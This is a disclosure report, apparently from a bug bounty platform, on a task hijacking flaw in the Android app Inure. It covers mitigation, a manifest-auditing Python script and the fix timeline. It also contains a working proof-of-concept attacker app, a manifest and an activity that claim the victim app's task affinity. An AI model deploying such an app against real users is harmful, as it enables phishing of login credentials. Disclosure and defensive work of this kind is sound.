Android Manifest Misconfiguration Leading to Task Hijacking in hamza417/inure

Valid

Reported on

Aug 20th 2023


Description

Task hijacking allows malicious apps to inherit permissions of vulnerable apps and is usually used for phishing login credentials of victims. This vulnerability applies to all Android versions before Android 11.

Steps To Reproduce:

  1. Victim installs malicious app
  2. Victim starts malicious app (could also be a background service)
  3. Victim opens legitimate app (Inure app) which the malicious app can intercept.

Video Proof of Concept

Video POC

Mitigation

To prevent this attack, set the taskAffinity attribute of the application's activities to the empty string (android:taskAffinity="") in each <activity> tag of AndroidManifest.xml, which forces the activities to use a randomly generated task affinity, or set it on the <application> tag to enforce it for all activities in the application.
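One way to check a manifest for this mitigation, as an added example (not part of the original report or the Inure code base): it resolves each activity's effective taskAffinity, using the activity's own attribute, then the <application> attribute, then the package name, and lists activities where the result is not the empty string. The package com.example.victim, the activity names and the helper names are constructed for illustration.

```python
import xml.etree.ElementTree as ET

ANDROID_NS = "http://schemas.android.com/apk/res/android"
AFFINITY = f"{{{ANDROID_NS}}}taskAffinity"
NAME = f"{{{ANDROID_NS}}}name"


def effective_affinities(manifest_xml):
    """Return {activity name: effective taskAffinity} for one manifest."""
    root = ET.fromstring(manifest_xml)
    package = root.get("package", "")  # assumes package is set in the manifest
    app = root.find("application")
    if app is None:
        return {}
    # <application> sets the default for its activities; when it has no
    # taskAffinity attribute, the default affinity is the package name.
    app_default = app.get(AFFINITY, package)
    return {
        node.get(NAME, "?"): node.get(AFFINITY, app_default)
        for node in app.findall("activity")
    }


def audit(manifest_xml):
    """List activities whose effective taskAffinity is not the empty string."""
    affinities = effective_affinities(manifest_xml)
    return sorted(name for name, value in affinities.items() if value != "")


def sample(app_attr="", settings_attr=""):
    """Build a constructed sample manifest (hypothetical package and activities)."""
    return f"""<manifest xmlns:android="{ANDROID_NS}" package="com.example.victim">
  <application{app_attr}>
    <activity android:name=".MainActivity" />
    <activity android:name=".SettingsActivity"{settings_attr} />
  </application>
</manifest>"""


EMPTY = ' android:taskAffinity=""'
VULNERABLE = sample()                      # no taskAffinity anywhere
HARDENED = sample(app_attr=EMPTY)          # mitigation at <application>
MIXED = sample(app_attr=EMPTY,             # one activity overrides the default
               settings_attr=' android:taskAffinity="com.example.victim.settings"')

if __name__ == "__main__":
    for label, xml in (("vulnerable", VULNERABLE), ("hardened", HARDENED), ("mixed", MIXED)):
        print(label, audit(xml))
```

The mixed case shows why an application-level setting alone is not enough to review: an activity that declares its own non-empty taskAffinity overrides it.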

Attacker App Code

Android Manifest

<?xml version="1.0" encoding="utf-8"?>
<manifest xmlns:android="http://schemas.android.com/apk/res/android"
    xmlns:tools="http://schemas.android.com/tools"
    package="com.m0ck3d.taskhijackingattackapp"
    tools:ignore="ExtraText">

    <application
        android:allowBackup="true"
        android:icon="@drawable/daverage"
        android:label="AttackAppTaskHijacking"
        android:roundIcon="@drawable/daverage"
        android:supportsRtl="true"
        android:theme="@style/Theme.Taskhijackingattackapp"
        android:taskAffinity="app.simple.inure">
        <activity
            android:name=".MainActivity"
            android:launchMode="singleTask"
            android:excludeFromRecents="true"
            android:exported="true">
            <intent-filter>
                <action android:name="android.intent.action.MAIN" />

                <category android:name="android.intent.category.LAUNCHER" />
            </intent-filter>
        </activity>
    </application>

</manifest>

Main Activity

import android.os.Bundle
import androidx.appcompat.app.AppCompatActivity

class MainActivity : AppCompatActivity() {
    override fun onCreate(savedInstanceState: Bundle?) {
        super.onCreate(savedInstanceState)
        setContentView(R.layout.activity_main)

        // Send this task to the background as soon as the activity is created.
        moveTaskToBack(true)
    }

    override fun onResume() {
        super.onResume()
        // Show this activity's layout whenever the task is brought to the front.
        setContentView(R.layout.activity_main)
    }
}

Impact

Due to a misconfiguration in the Android manifest file, it was possible to perform a task hijacking attack. An attacker could create a malicious mobile application that hijacks a legitimate app and steals any potentially sensitive information once installed on the victim's device.

We are processing your report and will contact the hamza417/inure team within 24 hours. a month ago
M0ck3d modified the report
a month ago
We have contacted a member of the hamza417/inure team and are waiting to hear back a month ago
M0ck3d modified the report
a month ago
Hamza Rizwan gave praise a month ago
Thanks for the heads-up.
The researcher's credibility has slightly increased as a result of the maintainer's thanks: +1
M0ck3d modified the report
23 days ago
M0ck3d modified the report
23 days ago
Hamza Rizwan validated this vulnerability 23 days ago
M0ck3d has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
Hamza Rizwan marked this as fixed in build92 with commit 09762e 23 days ago
Hamza Rizwan has been awarded the fix bounty
This vulnerability has been assigned a CVE
This vulnerability is scheduled to go public on Sep 10th 2023
Hamza Rizwan gave praise 23 days ago
Thanks for the heads-up.
The researcher's credibility has slightly increased as a result of the maintainer's thanks: +1
M0ck3d
23 days ago

Researcher


@maintainer @hamza417 Thank you so much !

Hamza Rizwan published this vulnerability 12 days ago

m0ck3d appreciate
